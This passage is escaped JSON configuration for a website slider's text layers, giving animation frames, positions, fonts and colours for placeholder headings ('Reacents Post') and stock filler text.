frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\"},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"19px\",\"e\":true},\"n\":{\"v\":\"19px\",\"e\":true},\"t\":{\"v\":\"19px\"},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"0px\",\"e\":true},\"n\":{\"v\":\"0px\",\"e\":true},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\"},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\"},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Reacents Post\",\"alias\":\"Reacents Post\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-635px\",\"e\":true},\"n\":{\"v\":\"125px\",\"e\":true},\"t\":{\"v\":\"125px\"},\"m\":{\"v\":\"125px\"}},\"y\":{\"d\":{\"v\":\"-130px\",\"e\":true},\"n\":{\"v\":\"376px\",\"e\":true},\"t\":{\"v\":\"376px\"},\"m\":{\"v\":\"376px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\"},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Reacents Post\",\"alias\":\"Reacents Post\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-631px\",\"e\":true},\"n\":{\"v\":\"126px\",\"e\":true},\"t\":{\"v\":\"246px\",\"e\":true},\"m\":{\"v\":\"246px\"}},\"y\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"518px\",\"e\":true},\"t\":{\"v\":\"427px\",\"e\":true},\"m\":{\"v\":\"427px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Reacents Post\",\"alias\":\"Reacents Post\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-629px\",\"e\":true},\"n\":{\"v\":\"127px\",\"e\":true},\"t\":{\"v\":\"247px\",\"e\":true},\"m\":{\"v\":\"247px\"}},\"y\":{\"d\":{\"v\":\"164px\",\"e\":true},\"n\":{\"v\":\"665px\",\"e\":true},\"t\":{\"v\":\"571px\",\"e\":true},\"m\":{\"v\":\"571px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"24px\",\"e\":true},\"n\":{\"v\":\"24px\",\"e\":true},\"t\":{\"v\":\"24px\",\"e\":true},\"m\":{\"v\":\"24px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\",\"e\":true},\"t\":{\"v\":\"#3c3c3c\",\"e\":true},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-541px\",\"e\":true},\"n\":{\"v\":\"-421px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"-59px\",\"e\":true},\"n\":{\"v\":\"-21px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\"